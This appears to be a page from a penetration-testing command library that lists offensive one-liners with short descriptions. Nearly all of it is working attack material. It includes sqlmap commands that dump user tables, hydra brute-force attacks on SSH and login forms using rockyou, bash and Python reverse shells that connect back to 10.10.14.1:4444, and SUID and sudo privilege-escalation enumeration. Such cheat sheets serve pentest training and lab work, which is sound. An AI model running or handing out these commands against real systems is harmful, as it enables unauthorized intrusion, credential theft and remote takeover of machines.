Library
Search the live database for syntax, tools, use cases, tags, MITRE context, and safe lab-ready command examples.
Run vulnerability detection NSE scripts against common service ports
nmap --script vuln -sV -p 80,443,22,21 <target>Directory and file brute-force enumeration against a web server
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt -t 50Virtual host (subdomain) enumeration via HTTP Host header fuzzing
gobuster vhost -u http://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 30Automated SQL injection discovery and database enumeration
sqlmap -u "http://target.com/page?id=1" --dbs --batch --level=3 --risk=2POST-based SQL injection with credential dump from specific table
sqlmap -u "http://target.com/login" --data="user=admin&pass=test" --method POST -D webapp_db -T users --dumpSSH brute-force attack against a single username with rockyou wordlist
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4 -VHTTP POST form brute-force with custom failure string detection
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt http-post-form "//login.php:username=^USER^&password=^PASS^:Invalid credentials" -t 30Start a Netcat listener to receive an incoming reverse shell connection
nc -lvnp 4444Bash TCP reverse shell one-liner — executes on the target to connect back
r'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'Python3 reverse shell one-liner for targets with Python installed
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'Find all SUID binaries on the system for privilege escalation opportunities
find / -perm -4000 -type f 2>/dev/nullList commands the current user can run with sudo — key privesc enumeration step
sudo -l